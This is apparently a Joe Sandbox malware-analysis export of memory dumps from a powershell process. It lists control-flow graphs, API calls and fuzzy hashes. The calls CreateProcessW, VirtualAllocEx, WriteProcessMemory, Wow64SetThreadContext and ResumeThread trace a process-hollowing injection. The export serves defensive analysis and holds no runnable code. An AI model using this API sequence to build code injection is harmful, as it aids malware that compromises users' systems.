                                                                                                                                                                          execution_graph 8615 267e02 8617 267e0a 8615->8617 8618 267d2f 8617->8618 8620 267dc6 8618->8620 8622 267e46 8618->8622 8619 267e36 8623 267e77 8622->8623 8624 267e8c 8623->8624 8626 267ea7 8623->8626 8647 267e46 8 API calls 8623->8647 8649 267ec0 8623->8649 8624->8619 8630 2683fb 8626->8630 8672 267344 8626->8672 8627 26867d CreateProcessW 8631 2686f1 8627->8631 8628 267fcc 8629 267350 Wow64SetThreadContext 8628->8629 8628->8630 8632 26802a 8629->8632 8630->8627 8633 268411 8630->8633 8632->8630 8634 268119 VirtualAllocEx 8632->8634 8633->8619 8635 268166 8634->8635 8636 268191 VirtualAllocEx 8635->8636 8637 2681e5 8635->8637 8636->8637 8637->8630 8638 267368 WriteProcessMemory 8637->8638 8640 268222 8638->8640 8639 268330 8639->8630 8641 267368 WriteProcessMemory 8639->8641 8640->8630 8640->8639 8646 267368 WriteProcessMemory 8640->8646 8642 268359 8641->8642 8642->8630 8643 267374 Wow64SetThreadContext 8642->8643 8644 2683b7 8643->8644 8644->8630 8645 2683bb ResumeThread 8644->8645 8645->8630 8646->8640 8647->8623 8650 267f39 8649->8650 8651 267344 CreateProcessW 8650->8651 8663 2683fb 8650->8663 8653 267fcc 8651->8653 8652 26867d CreateProcessW 8655 2686f1 8652->8655 8653->8663 8676 267350 8653->8676 8656 268411 8656->8623 8657 26802a 8658 268119 VirtualAllocEx 8657->8658 8657->8663 8659 268166 8658->8659 8660 268191 VirtualAllocEx 8659->8660 8661 2681e5 8659->8661 8660->8661 8661->8663 8680 267368 8661->8680 8663->8652 8663->8656 8664 268330 8664->8663 8665 267368 WriteProcessMemory 8664->8665 8666 268359 8665->8666 8666->8663 8684 267374 8666->8684 8667 268222 8667->8663 8667->8664 8671 267368 WriteProcessMemory 8667->8671 8670 2683bb ResumeThread 8670->8663 8671->8667 8673 268598 CreateProcessW 8672->8673 8675 2686f1 8673->8675 8677 2687d8 Wow64SetThreadContext 8676->8677 8679 268852 8677->8679 8679->8657 8681 268950 WriteProcessMemory 8680->8681 8683 2689db 8681->8683 8683->8667 8685 2687d8 Wow64SetThreadContext 8684->8685 8687 2683b7 8685->8687 8687->8663 8687->8670

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 267ec0-267f71 4 267f77-267f7c 0->4 5 26857c-268611 0->5 6 267f7e-267f88 4->6 7 267f8a 4->7 10 268613-268616 5->10 11 268619-268620 5->11 9 267f8f-267f91 6->9 7->9 12 267f93-267fa5 9->12 13 267fab-267fce call 267344 9->13 10->11 14 268622-268628 11->14 15 26862b-268641 11->15 12->13 21 267fd4-267fe9 13->21 22 268505-268518 13->22 14->15 17 268643-268649 15->17 18 26864c-2686ef CreateProcessW 15->18 17->18 25 2686f1-2686f7 18->25 26 2686f8-268770 18->26 28 268416 21->28 29 267fef-268013 21->29 36 26851f-268535 22->36 25->26 52 268782-268789 26->52 53 268772-268778 26->53 34 26841b-26842e 28->34 29->36 41 268019-26802c call 267350 29->41 51 268435-268448 34->51 36->5 48 268537-26853f 36->48 49 268032-26803c 41->49 50 2684eb-2684fe 41->50 61 268541-268543 call 2666fc 48->61 62 268548-268555 48->62 49->36 54 268042-26805f 49->54 50->22 75 26844f-268462 51->75 57 2687a0 52->57 58 26878b-26879a 52->58 53->52 54->28 59 268065-26807f call 26735c 54->59 64 2687a1 57->64 58->57 71 268085-26808e 59->71 72 2684d1-2684e4 59->72 61->62 79 268557 62->79 80 26855c-268579 62->80 64->64 73 268090-2680d4 71->73 74 2680ef-2680f5 71->74 72->50 83 2680d6-2680dc 73->83 84 2680dd-2680e9 73->84 74->28 78 2680fb-26810b 74->78 91 268469-26847c 75->91 78->28 89 268111-268164 VirtualAllocEx 78->89 79->80 83->84 84->74 88 2684b7-2684ca 84->88 88->72 94 268166-26816c 89->94 95 26816d-26818f 89->95 110 268483-268496 91->110 94->95 96 268191-2681e3 VirtualAllocEx 95->96 97 2681fc-268203 95->97 101 2681e5-2681eb 96->101 102 2681ec-2681f6 96->102 103 26849d-2684b0 97->103 104 268209-268224 call 267368 97->104 101->102 102->97 103->88 104->110 111 26822a-268233 104->111 110->103 111->28 113 268239-26823f 111->113 113->28 115 268245-268250 113->115 115->28 118 268256-268260 115->118 119 268266-26826b 118->119 120 268330-268341 118->120 119->28 121 268271-268284 119->121 120->28 124 268347-26835b call 267368 120->124 121->28 125 26828a-268299 121->125 124->75 129 268361-268367 124->129 125->28 130 26829f-2682af 125->130 129->28 131 26836d-26837e 129->131 136 268312-268315 130->136 137 2682b1-2682b4 130->137 134 268380-268383 131->134 135 268389-268391 131->135 134->135 135->28 138 268397-2683a1 135->138 136->28 139 26831b-26831e 136->139 137->28 140 2682ba-2682bd 137->140 138->36 141 2683a7-2683b9 call 267374 138->141 139->28 142 268324-26832a 139->142 140->28 143 2682c3-2682f1 140->143 141->51 147 2683bb-2683f9 ResumeThread 141->147 142->119 142->120 143->28 151 2682f7-268305 call 267368 143->151 149 268402-26840f 147->149 150 2683fb-268401 147->150 149->34 152 268411 149->152 150->149 155 26830a-26830c 151->155 152->79 155->91 155->136
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,?,00000000,00003000,00000040), ref: 0026814D
                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 002681CC
                                                                                                                                                                          • ResumeThread.KERNELBASE(?), ref: 002683E2
                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 002686DC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_260000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual$CreateProcessResumeThread
                                                                                                                                                                          • String ID: lX
                                                                                                                                                                          • API String ID: 1213262536-2093460002
                                                                                                                                                                          • Opcode ID: 0403cf6fca7eed77ed6ac74f23bae874bfac37bf4d9dd995c77a99da10a3fd89
                                                                                                                                                                          • Instruction ID: ff6b78a28cbd7c889a0de5f6f86650c09698de77d3ca0f6e4c70a178b4863c97
                                                                                                                                                                          • Opcode Fuzzy Hash: 0403cf6fca7eed77ed6ac74f23bae874bfac37bf4d9dd995c77a99da10a3fd89
                                                                                                                                                                          • Instruction Fuzzy Hash: 3432B170A102198FDB24DF64C844BAEBBB2AF84304F1482A9E449BB391DF749E95CF51

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 156 267e46-267e72 157 267e77-267e80 156->157 320 267e82 call 267e46 157->320 321 267e82 call 267ec0 157->321 158 267e88-267e8a 159 267e96-267e99 158->159 160 267e8c-267e95 158->160 161 267ea7-267f71 159->161 162 267e9b-267e9e 159->162 168 267f77-267f7c 161->168 169 26857c-268611 161->169 162->157 163 267ea0-267ea6 162->163 170 267f7e-267f88 168->170 171 267f8a 168->171 174 268613-268616 169->174 175 268619-268620 169->175 173 267f8f-267f91 170->173 171->173 176 267f93-267fa5 173->176 177 267fab-267fce call 267344 173->177 174->175 178 268622-268628 175->178 179 26862b-268641 175->179 176->177 185 267fd4-267fe9 177->185 186 268505-268518 177->186 178->179 181 268643-268649 179->181 182 26864c-2686ef CreateProcessW 179->182 181->182 189 2686f1-2686f7 182->189 190 2686f8-268770 182->190 192 268416 185->192 193 267fef-268013 185->193 200 26851f-268535 186->200 189->190 216 268782-268789 190->216 217 268772-268778 190->217 198 26841b-26842e 192->198 193->200 205 268019-26802c call 267350 193->205 215 268435-268448 198->215 200->169 212 268537-26853f 200->212 213 268032-26803c 205->213 214 2684eb-2684fe 205->214 225 268541-268543 call 2666fc 212->225 226 268548-268555 212->226 213->200 218 268042-26805f 213->218 214->186 239 26844f-268462 215->239 221 2687a0 216->221 222 26878b-26879a 216->222 217->216 218->192 223 268065-26807f call 26735c 218->223 228 2687a1 221->228 222->221 235 268085-26808e 223->235 236 2684d1-2684e4 223->236 225->226 243 268557 226->243 244 26855c-268579 226->244 228->228 237 268090-2680d4 235->237 238 2680ef-2680f5 235->238 236->214 247 2680d6-2680dc 237->247 248 2680dd-2680e9 237->248 238->192 242 2680fb-26810b 238->242 255 268469-26847c 239->255 242->192 253 268111-268164 VirtualAllocEx 242->253 243->244 247->248 248->238 252 2684b7-2684ca 248->252 252->236 258 268166-26816c 253->258 259 26816d-26818f 253->259 274 268483-268496 255->274 258->259 260 268191-2681e3 VirtualAllocEx 259->260 261 2681fc-268203 259->261 265 2681e5-2681eb 260->265 266 2681ec-2681f6 260->266 267 26849d-2684b0 261->267 268 268209-268224 call 267368 261->268 265->266 266->261 267->252 268->274 275 26822a-268233 268->275 274->267 275->192 277 268239-26823f 275->277 277->192 279 268245-268250 277->279 279->192 282 268256-268260 279->282 283 268266-26826b 282->283 284 268330-268341 282->284 283->192 285 268271-268284 283->285 284->192 288 268347-26835b call 267368 284->288 285->192 289 26828a-268299 285->289 288->239 293 268361-268367 288->293 289->192 294 26829f-2682af 289->294 293->192 295 26836d-26837e 293->295 300 268312-268315 294->300 301 2682b1-2682b4 294->301 298 268380-268383 295->298 299 268389-268391 295->299 298->299 299->192 302 268397-2683a1 299->302 300->192 303 26831b-26831e 300->303 301->192 304 2682ba-2682bd 301->304 302->200 305 2683a7-2683b9 call 267374 302->305 303->192 306 268324-26832a 303->306 304->192 307 2682c3-2682f1 304->307 305->215 311 2683bb-2683f9 ResumeThread 305->311 306->283 306->284 307->192 315 2682f7-268305 call 267368 307->315 313 268402-26840f 311->313 314 2683fb-268401 311->314 313->198 316 268411 313->316 314->313 319 26830a-26830c 315->319 316->243 319->255 319->300 320->158 321->158
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_260000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: lX
                                                                                                                                                                          • API String ID: 0-2093460002
                                                                                                                                                                          • Opcode ID: 302a407d61136299b3bee1fe3e2d0d154d44657a9019870af4c7fa0860638b86
                                                                                                                                                                          • Instruction ID: c9a2c86650b33bc9a04c91ae3f8f108016eafd23f2d82d3320437b054c948685
                                                                                                                                                                          • Opcode Fuzzy Hash: 302a407d61136299b3bee1fe3e2d0d154d44657a9019870af4c7fa0860638b86
                                                                                                                                                                          • Instruction Fuzzy Hash: EAF18E70A143198FDB24CF24CC84BA9BBB6AF85344F2482A9E54CA7391DF749E94CF51

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 322 451e38-451e5b 323 452036-452068 322->323 324 451e61-451e66 322->324 338 452078 323->338 339 45206a-452076 323->339 325 451e7e-451e82 324->325 326 451e68-451e6e 324->326 330 451fe3-451fed 325->330 331 451e88-451e8c 325->331 327 451e70 326->327 328 451e72-451e7c 326->328 327->325 328->325 335 451fef-451ff8 330->335 336 451ffb-452001 330->336 333 451e9f 331->333 334 451e8e-451e9d 331->334 337 451ea1-451ea3 333->337 334->337 340 452007-452013 336->340 341 452003-452005 336->341 337->330 343 451ea9-451ec9 337->343 344 45207a-45207c 338->344 339->344 345 452015-452033 340->345 341->345 362 451ee8 343->362 363 451ecb-451ee6 343->363 346 4520f6-452100 344->346 347 45207e-452080 344->347 350 452102-452108 346->350 351 45210b-452111 346->351 353 452090 347->353 354 452082-45208e 347->354 355 452117-452123 351->355 356 452113-452115 351->356 357 452092-452094 353->357 354->357 359 452125-45213e 355->359 356->359 357->346 361 452096-45209c 357->361 364 45209e-4520a0 361->364 365 4520aa-4520b3 361->365 370 451eea-451eec 362->370 363->370 364->365 367 4520b5-4520b7 365->367 368 4520c1-4520de 365->368 367->368 379 452141-452146 368->379 380 4520e0-4520f0 368->380 370->330 372 451ef2-451ef4 370->372 375 451f04 372->375 376 451ef6-451f02 372->376 378 451f06-451f08 375->378 376->378 378->330 381 451f0e-451f2e 378->381 379->380 380->346 385 451f46-451f4a 381->385 386 451f30-451f36 381->386 389 451f64-451f68 385->389 390 451f4c-451f52 385->390 387 451f38 386->387 388 451f3a-451f3c 386->388 387->385 388->385 393 451f6f-451f71 389->393 391 451f54 390->391 392 451f56-451f62 390->392 391->389 392->389 394 451f73-451f79 393->394 395 451f89-451fe0 393->395 397 451f7d-451f7f 394->397 398 451f7b 394->398 397->395 398->395
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_450000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @==$@==
                                                                                                                                                                          • API String ID: 0-1433957189
                                                                                                                                                                          • Opcode ID: b3faa8eba6c7c8a8f7bbfd42b3ae2f161b071a4bff3eab3dd1febb816154ddbb
                                                                                                                                                                          • Instruction ID: a0fec3da8f9bb8c5df28918e5baa3a2e01a45d4d79ff2a38e7f4319ed32bb168
                                                                                                                                                                          • Opcode Fuzzy Hash: b3faa8eba6c7c8a8f7bbfd42b3ae2f161b071a4bff3eab3dd1febb816154ddbb
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F7176327002059FDB245A69844077BB7A2AFC2712F24807BDD45DB3A3DBB9CD4AC766

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 400 451e19-451e5b 402 452036-452068 400->402 403 451e61-451e66 400->403 417 452078 402->417 418 45206a-452076 402->418 404 451e7e-451e82 403->404 405 451e68-451e6e 403->405 409 451fe3-451fed 404->409 410 451e88-451e8c 404->410 406 451e70 405->406 407 451e72-451e7c 405->407 406->404 407->404 414 451fef-451ff8 409->414 415 451ffb-452001 409->415 412 451e9f 410->412 413 451e8e-451e9d 410->413 416 451ea1-451ea3 412->416 413->416 419 452007-452013 415->419 420 452003-452005 415->420 416->409 422 451ea9-451ec9 416->422 423 45207a-45207c 417->423 418->423 424 452015-452033 419->424 420->424 441 451ee8 422->441 442 451ecb-451ee6 422->442 425 4520f6-452100 423->425 426 45207e-452080 423->426 429 452102-452108 425->429 430 45210b-452111 425->430 432 452090 426->432 433 452082-45208e 426->433 434 452117-452123 430->434 435 452113-452115 430->435 436 452092-452094 432->436 433->436 438 452125-45213e 434->438 435->438 436->425 440 452096-45209c 436->440 443 45209e-4520a0 440->443 444 4520aa-4520b3 440->444 449 451eea-451eec 441->449 442->449 443->444 446 4520b5-4520b7 444->446 447 4520c1-4520de 444->447 446->447 458 452141-452146 447->458 459 4520e0-4520f0 447->459 449->409 451 451ef2-451ef4 449->451 454 451f04 451->454 455 451ef6-451f02 451->455 457 451f06-451f08 454->457 455->457 457->409 460 451f0e-451f2e 457->460 458->459 459->425 464 451f46-451f4a 460->464 465 451f30-451f36 460->465 468 451f64-451f68 464->468 469 451f4c-451f52 464->469 466 451f38 465->466 467 451f3a-451f3c 465->467 466->464 467->464 472 451f6f-451f71 468->472 470 451f54 469->470 471 451f56-451f62 469->471 470->468 471->468 473 451f73-451f79 472->473 474 451f89-451fe0 472->474 476 451f7d-451f7f 473->476 477 451f7b 473->477 476->474 477->474
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_450000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @==$@==
                                                                                                                                                                          • API String ID: 0-1433957189
                                                                                                                                                                          • Opcode ID: 0ec115f5f92f2499cc6111be9c740d96857722a501f68c7eebba74f9f1fc2626
                                                                                                                                                                          • Instruction ID: 5256f210ee28b017d5221f540199c842ae889c55b9108549e4ed71bf2fb5832b
                                                                                                                                                                          • Opcode Fuzzy Hash: 0ec115f5f92f2499cc6111be9c740d96857722a501f68c7eebba74f9f1fc2626
                                                                                                                                                                          • Instruction Fuzzy Hash: 633122326043059FDB218B64C85077BBBB1AF91712F2441ABDC058B2A3D73DCD89CB6A

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 479 267344-268611 481 268613-268616 479->481 482 268619-268620 479->482 481->482 483 268622-268628 482->483 484 26862b-268641 482->484 483->484 485 268643-268649 484->485 486 26864c-2686ef CreateProcessW 484->486 485->486 488 2686f1-2686f7 486->488 489 2686f8-268770 486->489 488->489 496 268782-268789 489->496 497 268772-268778 489->497 498 2687a0 496->498 499 26878b-26879a 496->499 497->496 500 2687a1 498->500 499->498 500->500
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 002686DC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_260000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                                          • Opcode ID: 73cc60b2a5d8bc4ec6a263b01741c4b0d96e511abe5a4fd0df57009951b83571
                                                                                                                                                                          • Instruction ID: 79568a73854b3a564f5607b8213ba9faff52f3d670ad34a494f6d1ffd0c78315
                                                                                                                                                                          • Opcode Fuzzy Hash: 73cc60b2a5d8bc4ec6a263b01741c4b0d96e511abe5a4fd0df57009951b83571
                                                                                                                                                                          • Instruction Fuzzy Hash: 955128B1911219DFEF24CF99C980BDDBBB5BF48304F1085AAE909B7250DB719A98CF50

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 502 267368-268996 504 2689a0-2689d9 WriteProcessMemory 502->504 505 268998-26899e 502->505 506 2689e2-268a03 504->506 507 2689db-2689e1 504->507 505->504 507->506
                                                                                                                                                                          APIs
                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,00000000,00000000,134C197F,00000000,?,?,?,00000000,00000000,?,00268222,?,00000000,?), ref: 002689CC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_260000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                                          • Opcode ID: 78bded305f3d694c349ecdf536949f55083675d36608b830719a3dd5138c53a9
                                                                                                                                                                          • Instruction ID: e28186fa70cc63d5f0f2f42becf0e4a32139cc3656225f183ef3d7ca51ee8311
                                                                                                                                                                          • Opcode Fuzzy Hash: 78bded305f3d694c349ecdf536949f55083675d36608b830719a3dd5138c53a9
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A21E7B1911209DFDB10CF99C884BEEBBF4FB48314F508529E958A7340D379A954CBA5

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 509 268949-268996 510 2689a0-2689d9 WriteProcessMemory 509->510 511 268998-26899e 509->511 512 2689e2-268a03 510->512 513 2689db-2689e1 510->513 511->510 513->512
                                                                                                                                                                          APIs
                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,00000000,00000000,134C197F,00000000,?,?,?,00000000,00000000,?,00268222,?,00000000,?), ref: 002689CC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_260000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                                          • Opcode ID: 2a8043ffa4396bdd5fb76ec64efdd09096f411351c24f188c281b508038b06de
                                                                                                                                                                          • Instruction ID: 9197ad39e1d9cffdd103de81b539ef1f53eb1eff7d008f706e1ca8c665632d89
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a8043ffa4396bdd5fb76ec64efdd09096f411351c24f188c281b508038b06de
                                                                                                                                                                          • Instruction Fuzzy Hash: 5C2134B6911209DFDB10CFA9C984BDEBBF4FF48310F50842AE458A3300D378AA44CBA1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 522 267374-268818 524 268824-268850 Wow64SetThreadContext 522->524 525 26881a-268822 522->525 526 268852-268858 524->526 527 268859-26887a 524->527 525->524 526->527
                                                                                                                                                                          APIs
                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,0026802A), ref: 00268843
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_260000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                                          • Opcode ID: 6b75e6291e33b7f7b6e9d711d7e434d761698fcbcf3868def1d6ff5d0d9bc3c1
                                                                                                                                                                          • Instruction ID: e1f658d7725bda5900d5b851edc484905671980b700ef62374ba833dbb5e872d
                                                                                                                                                                          • Opcode Fuzzy Hash: 6b75e6291e33b7f7b6e9d711d7e434d761698fcbcf3868def1d6ff5d0d9bc3c1
                                                                                                                                                                          • Instruction Fuzzy Hash: 7F1137B1D102498FDB60CF9AC884BDEFBF5EB88310F558529D458B3640D778A945CFA1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 515 267350-268818 517 268824-268850 Wow64SetThreadContext 515->517 518 26881a-268822 515->518 519 268852-268858 517->519 520 268859-26887a 517->520 518->517 519->520
                                                                                                                                                                          APIs
                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,0026802A), ref: 00268843
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_260000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                                          • Opcode ID: 9df5fb288bc54b5e3ff54e3607b1cfce04b48e92eb862caaf85d6e9af643371b
                                                                                                                                                                          • Instruction ID: 0bd6e16ea228a3209ae3ed02678c7cc21fed18327433438a4b6d1a046318879c
                                                                                                                                                                          • Opcode Fuzzy Hash: 9df5fb288bc54b5e3ff54e3607b1cfce04b48e92eb862caaf85d6e9af643371b
                                                                                                                                                                          • Instruction Fuzzy Hash: B51126B1D102498FDB50CF9AC884BDEFBF5EB88310F258529D458A3640D778A944CFA1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_450000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d319e25419aa6ab2d165bbf782353f4054060154e62eff3a7b69a3a0afd2462b
                                                                                                                                                                          • Instruction ID: 7e64bbd3be785fcf59bc635acd64c1690fc6451838ec5906fa3f38aaea037213
                                                                                                                                                                          • Opcode Fuzzy Hash: d319e25419aa6ab2d165bbf782353f4054060154e62eff3a7b69a3a0afd2462b
                                                                                                                                                                          • Instruction Fuzzy Hash: 05123531B04204DFDB159F64C4507ABBBA2AF86353F14C0ABE8158B352DB79CE4ACB56

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 928 452278-45229e 929 4522a4-4522a9 928->929 930 45244a-452492 928->930 931 4522c1-4522c5 929->931 932 4522ab-4522b1 929->932 938 4525c4-4525f5 930->938 939 452498-45249d 930->939 933 4523f6-452400 931->933 934 4522cb-4522cd 931->934 935 4522b5-4522bf 932->935 936 4522b3 932->936 942 452402-45240b 933->942 943 45240e-452414 933->943 940 4522dd 934->940 941 4522cf-4522db 934->941 935->931 936->931 962 452605 938->962 963 4525f7-452603 938->963 944 4524b5-4524b9 939->944 945 45249f-4524a5 939->945 946 4522df-4522e1 940->946 941->946 947 452416-452418 943->947 948 45241a-452426 943->948 954 452576-452580 944->954 955 4524bf-4524c1 944->955 950 4524a7 945->950 951 4524a9-4524b3 945->951 946->933 952 4522e7-4522eb 946->952 953 452428-452447 947->953 948->953 950->944 951->944 957 4522ed-4522fc 952->957 958 4522fe 952->958 964 452582-45258a 954->964 965 45258d-452593 954->965 960 4524d1 955->960 961 4524c3-4524cf 955->961 967 452300-452302 957->967 958->967 968 4524d3-4524d5 960->968 961->968 970 452607-452609 962->970 963->970 971 452595-452597 965->971 972 452599-4525a5 965->972 967->933 973 452308-45230a 967->973 968->954 974 4524db-4524dd 968->974 975 452677-452681 970->975 976 45260b-45262a 970->976 977 4525a7-4525c1 971->977 972->977 979 45230c-452318 973->979 980 45231a 973->980 983 4524f7-4524f9 974->983 984 4524df-4524e5 974->984 981 452683-452687 975->981 982 45268a-452690 975->982 1004 45262c-452638 976->1004 1005 45263a 976->1005 987 45231c-45231e 979->987 980->987 988 452696-4526a2 982->988 989 452692-452694 982->989 993 452500-452502 983->993 990 4524e7 984->990 991 4524e9-4524f5 984->991 987->933 994 452324-452326 987->994 995 4526a4-4526c2 988->995 989->995 990->983 991->983 998 452504-45250a 993->998 999 45251a-452573 993->999 1001 452340-45234b 994->1001 1002 452328-45232e 994->1002 1009 45250c 998->1009 1010 45250e-452510 998->1010 1007 45234d-452350 1001->1007 1008 45235a-452366 1001->1008 1012 452330 1002->1012 1013 452332-45233e 1002->1013 1014 45263c-45263e 1004->1014 1005->1014 1007->1008 1015 452374-452384 1008->1015 1016 452368-45236a 1008->1016 1009->999 1010->999 1012->1001 1013->1001 1014->975 1018 452640-45265d 1014->1018 1022 452386-45238c 1015->1022 1023 45239c-4523f3 1015->1023 1016->1015 1025 4526c5-4526ca 1018->1025 1026 45265f-452671 1018->1026 1027 452390-452392 1022->1027 1028 45238e 1022->1028 1025->1026 1026->975 1027->1023 1028->1023
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_450000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2354b77fad987ca48b39c995bc78578defeedb301a6d320739dd03f0fb477ca8
                                                                                                                                                                          • Instruction ID: 0c9dc1bdf6e3231e94e6c368d3c9713126a15921f2a742af1becd258fce179ba
                                                                                                                                                                          • Opcode Fuzzy Hash: 2354b77fad987ca48b39c995bc78578defeedb301a6d320739dd03f0fb477ca8
                                                                                                                                                                          • Instruction Fuzzy Hash: F2B125317002459FCB258B358A1066BBBA1AFD7312F2480BBDC549B353DBB9CD4AC766

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
